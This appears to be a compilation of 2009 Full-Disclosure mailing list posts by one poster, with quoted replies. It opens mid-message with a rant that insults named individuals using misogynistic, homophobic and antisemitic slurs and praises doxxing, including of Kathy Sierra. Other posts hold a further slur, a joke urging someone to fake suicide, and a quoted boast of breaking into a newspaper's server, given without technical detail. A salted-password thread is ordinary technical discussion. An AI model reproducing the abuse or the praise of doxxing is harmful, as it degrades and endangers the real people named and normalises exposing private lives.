>>> Okay. You've been in contact with Hep? She's handed over her logs? Oh
>>> man, the FBI now has hundreds of megs of me scrolling ansi on IRC,
>>> telling her she's a sickly withered ghoul, calling her fat, and making
>>> fun of her Springeresque living situation of having 3 different kids
>>> by 3 different dads (seriously hep is basically the hip web2.0 version
>>> of used up trailer trash whore).
>>>
>>> Oclet's handed over his logs? Wow, the FBI now has records of all the
>>> times I've told him to stop doing cocaine and drinking and clean up
>>> his act.
>>>
>>> Sherrod DeGrippo was indeed a fed. If she's turned against me, the FBI
>>> now has all the records of me posting the information of people with
>>> autism to Encyclopedia Dramatica! I'm goin' down!
>>>
>>> Tehdely, the gay San Francisco Jew who works for blogging house Six
>>> Apart will be able to tell a jury that I, in the haze of a 5-balloon
>>> dose of nitrous oxide, did a "sieg heil" salute and shouted "heil
>>> hitler" while giggling hysterically. I, clearly, will be screwed by
>>> this revelation of SECRET KNOWLEDGE in the grand jury proceedings.
>>>
>>> And actually, you can make your living off of advertising and selling
>>> t-shirts. I made high sfigs off of direct marketing alone for several
>>> years.
>>>
>>> You antis are pathetic. You think you got one up on me by pasting some
>>> fuckin info I put in my fuckin LIVEJOURNAL? Is this what hackin is
>>> these days? Are you gonna start syndicating emo rants from 14 year old
>>> girls into f-d posts with ascii banners at the top, acting like you
>>> owned people?
>>>
>>> See, for a doxdrop to be proper, you have to do info that is not
>>> already public, and you have to tie it together in a way that reveals
>>> something about their lives that they did not want people to know.
>>>
>>> For example, when some clever soul revealed that Rob Levin of freenode
>>> didn't actually live in a trailer, had all sorts of welfare and was
>>> still using people's donations to supplement his income, that was a
>>> pretty sweet doxdrop:
>>> http://antisec.wordpress.com/2006/06/27/eyeballing-rob-levin/
>>>
>>> Or when somebody pieced together Kathy Sierra's sordid history of dick
>>> sucking, that was pretty fuckin' awesome:
>>> http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2007-03/msg00507.html
>>>
>>> You, sir, are a fucking amateur. You haven't uncovered anything new
>>> (the most well funded law enforcement organization in the world had to
>>> do that for you in their organized campaign, and you copied it from my
>>> livejournal), and it is certainly not anything I tried to hide, as I
>>> put it in my fucking blog. No secrets 

Re: [Full-disclosure] Question about police harassment. Police trying over years to "entrap" me as hacker.

[T Biehn]

MrX,
Dude.
Just fake your own suicide. This old school trick will solicit the
feds to your locale if you're actually being watched.

Other advice?

I want voice recordings, jpegs, vlog posts, else it didn't happen &
you're schizoid.

-Travis

On Wed, Sep 9, 2009 at 11:04 PM, Nick FitzGerald
 wrote:
> TheLearner wrote:
>
> <>
>> What would you do?
>
> I'm not sure what _I_ would do facing such a crisis, but I think the
> best thing for _you_ to do is hire n3td3v and Gary McKinnon's lawyer
> (s/he has been posting to this list lately, so should be easy to track
> down), and then get those two uber hackers to help as well -- they'll
> be much more help _to you_ than any private eye ever will...
>
>
>
> Regards,
>
> Nick FitzGerald
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Time to stop this non-sense

[T Biehn]

That's cool, your mom still 

superfluous.

-Travis

On Fri, Aug 28, 2009 at 12:50 PM, Gavin wrote:
> 2009/8/28 T Biehn :
>> Dear Gavin:
>>
>> My internet pseudonym is List.
>> I suggest that you stop spreading libel about me on the internet or I
>> will be forced to hire internet police and ruin your life.
>>
>> FOREVER.
>>
>> -Travis
>
> Not before I pwn your Grandma's PC and divert your weekly allowance. ;)
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Time to stop this non-sense

[T Biehn]

Dear Gavin:

My internet pseudonym is List.
I suggest that you stop spreading libel about me on the internet or I
will be forced to hire internet police and ruin your life.

FOREVER.

-Travis

On Fri, Aug 28, 2009 at 10:32 AM, Gavin wrote:
> Is this list all parody or wtf ???
>
> 2009/8/28 jamesleesmit...@aol.co.uk :
>> Hi
>>
>> I suggest whoever is trying to give n3td3v a bad name stop.
>>
>> James
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Sexless schadenfreude: the potential extremist Michael Crook.

[T Biehn]

I'm sure the man already has his big eye on Michael, especially since
his last name is Crook, these are facts they wouldn't miss.

On Tue, Aug 25, 2009 at 10:49 AM,  wrote:
> On Tue, 25 Aug 2009 10:07:07 -, Michael Crook said:
>
>> ~ John Doe / n3td3v (http://www.twitter.com/n3td3v)
>>
>> P.S. This is an anonymous,
>
> Hint: Look up big words like "anonymous" in the dictionary, make sure
> you're using them correctly. It adds that extra luster of competence to
> your postings.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Questions for the iProphet

[T Biehn]

"Do what thou wilt shall be the whole of the law"

On Fri, Aug 21, 2009 at 11:16 AM, Paul Schmehl  wrote:
>
> --On Friday, August 21, 2009 04:03:40 -0500 netdev.doc...@hushmail.com wrote:
>
> >
> > Hey weev.
> >
> > Now that the FBI and everything are all out to get you, I was
> > wondering what life on the lamb was like.
>
> Wouldn't life on the lamb be sheepophilia?  Wouldn't it be better to have life
> on the sheep, if you're so inclined?
>
> Or did you mean life on the lam?
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> ***
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



--
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Slander of security researcher n3td3v

[T Biehn]

Very exclusive membership of notable fallators. Avoid option 5.

-Travis

On Tue, Aug 11, 2009 at 5:00 PM,  wrote:
> Tell your faggot friend he can't be in our club.
>
> On Tue, 11 Aug 2009 16:24:09 -0400 someone lawyer
>  wrote:
>>List,
>>
>>My client is genuine, he has never been part of anti-sec.
>>
>>some...@lawyer.com
>>
>>--
>>Be Yourself @ mail.com!
>>Choose From 200+ Email Addresses
>>Get a Free Account at www.mail.com!
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
pgp http://pastebin.com/f6fd606da pgp

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Salted passwords

[T Biehn]

Thank you for the thoughtful analysis Raid. The hash and salt are both
known to the attacker :)
It looks like I'm going to have to settle with confounding efforts by
the man via increased hash computation cost.

-Travis

On Mon, Aug 10, 2009 at 6:53 PM,  wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Travis,
>
> On Mon, 10 Aug 2009 22:50:32 +0200 T Biehn  wrote:
>>I don't have control over the set. Sorry I wasn't more explicit
>>about
>>this. Although, it should have been obvious that the solution
>>needed
>>to satisfy the conditions:
>>Data to one way hash.
>>The set has 9,999,999,999 members.
>
> if these are the only two conditions, I wonder why a static salt
> does not satisfy your requirements? If the salt is not publicly
> known, the procedure is secure in respect to the hash-function in
> use...
>
> So, suppose the third condition is the salt may be publicly known.
>
> Suppose, we have plaintext (alphabet E, length of alphabet s = |E|)
> with fixed length, say 'c' chars. So if you insert the salt at a
> random position, there are c+1 possibilities for the position of
> the salt. So the bruteforce attacker has to run c more tests than
> having the salt in a fixed position.
>
> Comparing the two procedures under a theoretically view, there isnt
> a significant difference in terms of runtime complexity:
>
> If the salt is not publicly known and at a fixed position,
> complexity (means: number of possible plaintexts) is at O(s**c).
> Your method only rises complexity by a constant factor: It's at O(
> (c+1) * s**c).
>
> Theoretically this is negligible: If it takes me 2 hours to
> bruteforce procedure 1 (fixed position), why bother about 20 hours
> computing for procedure 2?
>
> Practically it depends on your overall requirements.
>
> Besides, your procedure lowers the latch for DoS... at least
> slightly (same argument as above).
>
> So far, my two cents...
>
> raid
> -BEGIN PGP SIGNATURE-
> Charset: UTF8
> Version: Hush 3.0
> Note: This signature can be verified at https://www.hushtools.com/verify
>
> wpwEAQMCAAYFAkqApOoACgkQ/WWNsggjSSFjgAP/Wr/yus6Zf8e/nkegfMw4AeRS5Xz4
> GP91CUbwEEgy0qMsL7HvrAc7oo7dt5PpEZIePVkBF8ea9WeW9RlX1YK7ZlkkIP6ZLKx2
> XgT515eGNeTMbcKSmAOWlIkL4JtKRBxh7YLb0QP0yi3pCY7MGl4ZAtcGN25vx3Nkkq18
> WMoO6VQ=
> =UN3m
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
pgp http://pastebin.com/f6fd606da pgp

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Salted passwords

[T Biehn]

Valdis,
I don't have control over the set. Sorry I wasn't more explicit about
this. Although, it should have been obvious that the solution needed
to satisfy the conditions:
Data to one way hash.
The set has 9,999,999,999 members.

Thanks for your input sweetie!

-Travis

On Mon, Aug 10, 2009 at 4:26 PM,  wrote:
> On Sun, 09 Aug 2009 20:14:57 EDT, T Biehn said:
>> Soliciting random suggestions.
>> Lets say I have data to one-way-hash.
>> The set has 9,999,999,999 members.
>
> Actually, if you're using a 10-digit decimal field, you probably have 10**10
> possible members - all-zeros counts too (unless there's *other* reasons zero
> isn't a legal ID).  It's those little off-by-one errors that tend to get you.
> ;)
>
>> It's relatively easy to brute force this, or create precomp tables.
>
> That's because you only have 10M billion members to brute force against.
>
>> So you add a salt to each.
>
> A better idea cryptographically would be to fix the 10**10 member limit, so
> that the set *could* have a much higher possible number of members.  Even
> staying at 10 characters, but allowing [A-Za-z0-9] (62 possible chars) raises
> your space to 62**10 or about 8.3*10**17 (or almost 10M times the difficuly).
> That's why most symmetric crypto algorithms use at least 64-bit or even larger
> keys, and even larger for RSA and similar public-key systems.
>
>



-- 
pgp http://pastebin.com/f6fd606da pgp

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Salted passwords

[T Biehn]

I'm flattered; If you only knew what it was for...
IHBT?

-Travis

On Mon, Aug 10, 2009 at 12:08 PM,  wrote:
> AntiSec would like to approach you by telling you to keep you
> whitehat filty ass off our list, Travis.
>
> Have a nice day sucking off Aitel.
>
> On Sun, 09 Aug 2009 20:14:57 -0400 T Biehn  wrote:
>>Soliciting random suggestions.
>>Lets say I have data to one-way-hash.
>>The set has 9,999,999,999 members.
>>It's relatively easy to brute force this, or create precomp
>>tables.
>>So you add a salt to each.
>>Still easy to brute force.
>>If you were to create it in such a way that the hash could exist
>>anywhere in the set member, does this increase the cost of
>>computation
>>enough?
>>
>>That is, consider a member 'abcdefg' with salt 329938255.
>>When authenticating against the server, it must permute over all
>>possible combinations of the salt and the set member in order to
>>determine the validity of the password.
>>
>>If anyone has a better approach, or would like to approach me off
>>list, or knows of a list more suited to these queries please feel
>>free
>>to redirect me :)
>>
>>-Travis
>>
>>___
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Ureleet is the Anti-Sec

[T Biehn]

n3td3v, ureleet, and anti-sec are actually all Hitler, posting after
being recently unfrozen from cryogenic sleep. He is using this as part
of his black magic scheme to bring back nazi occultism and rule the
world once again.

Careful review of all posts shows the superstructure of a subconscious
mind-virus, waiting for a trigger event deep in the recesses of our
collective minds.

When you want to go to it
Relax don't do it
When you want to come

-Travis

On Sun, Aug 9, 2009 at 12:20 AM,  wrote:
> n3td3v is our exploit coder. pheer infidelz.
>
> On Sat, 08 Aug 2009 19:31:26 -0400 someone lawyer
>  wrote:
>>List,
>>
>>Ureleet is the Anti-Sec he been trying to slander n3td3v
>>(legitimate
>>security researcher) the whole time.
>>
>>some...@lawyer.com
>>
>>--
>>Be Yourself @ mail.com!
>>Choose From 200+ Email Addresses
>>Get a Free Account at www.mail.com!
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Hindustan Times epaper Server Hacked

[T Biehn]

While your publications are slightly pretentious (who am I to talk?) I
applaud your idealism in an age of rampant cynicism.

Don't log into any US Government systems looking to liberate secret
UFO docs tho, that gets you extradited.

A small suggestion, do not use a consistent pseudonym, post completely
anonymously. It's difficult to keep the ego from making mistakes.

-Travis

On Sun, Aug 9, 2009 at 1:56 AM, Sky wrote:
> Hindustan Times epaper Server Hacked
> http://sky.net.in/hindustan-times-epaper-server-hacked/
>
> Hindustan Times (HT) is India’s leading newspaper, published since 1924 with
> roots in the independence movement. In 2008, the newspaper reported that
> with a (circulation of over 1.14 million) ranking them as the third largest
> circulatory daily English Newspaper in India. The Mumbai edition was
> launched on 14 July 2005. HT has a readership of (6.6 million) ranking them
> as the second most widely read English Newspaper after Times of India.
> (Source: Wikipedia article on Hindustan Times) -
> http://en.wikipedia.org/wiki/Hindustan_Times
>
> HindustanTimes + Hindustan epaper Server Hacked
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UNhLLVYI/ASM/JY9bc67HV14/s800/hindustan_times_hacked.jpg
>
> Why was Hindustan Times (HT) epaper Server Hacked ?
>
> Many people think that Hindustan Times (HT) (English Edition) + Hindustan
> (Hindi Edition) is available on the internet free of cost, HT Media has made
> it compulsory to register on their website in order to read the daily online
> edition of their published newspapers, on completion of registration HT
> Media provides you instant access to read daily edition, the CATCH is – you
> can only read the daily edition + past seven days editions (from the current
> date) as a free user, whileas if you wanna read any edition beyond seven
> days, you will have to pay a huge (rip off) amount to HT Media (in the name
> of digital archive subscription)
>
>
> Registration Information Collected by HindustanTimes
> http://lh6.ggpht.com/_gbWPSul_tCM/Sn5WIrsZxcI/ASs/Lc6NaQzxEfk/s800/HT_registration.jpg
>
> Free HindustanTimes Editions
> http://lh6.ggpht.com/_gbWPSul_tCM/Sn5UN35Yx5I/ASU/6THfLaMu00M/s800/HT_free_editions.jpg
>
> Restricted Access to HindustanTimes epaper Archives
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UN5umsJI/ASY/5_SfNzOEm7w/s800/HT_newspaper_subscribe.jpg
>
> Archive Subscription Charges for HindustanTimes is a total Rip Off
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5ViIwx2aI/ASo/6TMgKDuc6Vg/s800/HT_archive_charges.jpg
>
>
> As a hacker, i think its not fair (for anyone) to loot common people and
> sell (publicly gained) information in such a way, so i decided to peek
> inside the server and find some bugs / architectural flaws which would allow
> me to access past newspaper (Images / PDF) editions for free
>
> Within a couple of hours, i managed to find some bugs / architectural flaws
> (& vulnerabilities) which gave out free access to the past (Images / PDF)
> newspaper editions
>
> Calvin and Hobbes publishing error
>
> I used to search the newspaper (HT hard copy) every morning for technology
> related news (hoping any Indian journalist must have written some piece)
> that went on for like weeks and then i started reading Calvin and Hobbes
> (the comic strip) every day published in HT Cafe
>
> On 2nd / 4th / 9th June, Hindustan Times (HT) published the same Calvin and
> Hobbes strip, how should i react against this publishing error by Hindustan
> Times, as a fan of Calvin and Hobbes, i expect new comic strip every day
>
> Checkout the exact same Calvin and Hobbes strip published thrice on various
> days in the single month of June (2009)
>
>     2nd June
>
> http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/02/538/02_06_2009_538_013.jpg
>
>     9th June
>
> http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/09/538/09_06_2009_538_002.jpg
>
>     4th June
>
> http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/04/538/04_06_2009_538_006.jpg
>
> Informing the privileged authorities
>
> On 10th July 2009, i informed the editor and other top most authorities @
> HindustanTimes via email regarding the serious bugs / flaws (&
> vulnerabilities) on their ePaper Server which can be exploited to compromise
> data and cause financial losses for HT Media
>
> My email to HindustanTimes
> http://lh5.ggpht.com/_gbWPSul_tCM/Sn5WJt3UKGI/AS0/KOnhjTtBNnk/s800/my_email_hindustan_times.jpg
>
> Rashmi Chugh's reply to me
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5W9mSD0pI/ATI/O5hazb5IIY4/s800/rashmi_livemint_reply.jpg
>
> Although i received a reply from Rashmi Chugh (Business Head and Publisher,
> LIVEMINT) within 3 minutes, i waited for 24 hours to receive other
> recipients reply (as i wanted to know what they thought about the issue) but
> sadly no one replied back except Rashmi Chugh, so i sent her a reply the
> other day
>
> My reply to Rashmi Chugh, LIVEMINT
> http://lh3.ggpht.c

Re: [Full-disclosure] Salted passwords

[T Biehn]

Richard,
The approach I outline in my post is the correct one, that is, making
it computationally expensive to crack. I'm not trying to protect
passwords, think anonymizing account numbers and the like.. That is,
the possible combinations are a set that is unacceptably small.
Without an expensive compute step it's trivial to brute force given a
static salt location...

(excuse my use of shitty pseudocode, assume homogeneous length 10)

Typically the test is:

if storedHash = hashFcn(userPassword & storedSalt) //9,999,999,999 tests

if you randomly store the storedSalt ANYWHERE within userPassword, it becomes

for (int i=0; i wrote:
**REDACTED**
"explain please"
**REDACTED**

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Salted passwords

[T Biehn]

Soliciting random suggestions.
Lets say I have data to one-way-hash.
The set has 9,999,999,999 members.
It's relatively easy to brute force this, or create precomp tables.
So you add a salt to each.
Still easy to brute force.
If you were to create it in such a way that the hash could exist
anywhere in the set member, does this increase the cost of computation
enough?

That is, consider a member 'abcdefg' with salt 329938255.
When authenticating against the server, it must permute over all
possible combinations of the salt and the set member in order to
determine the validity of the password.

If anyone has a better approach, or would like to approach me off
list, or knows of a list more suited to these queries please feel free
to redirect me :)

-Travis

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/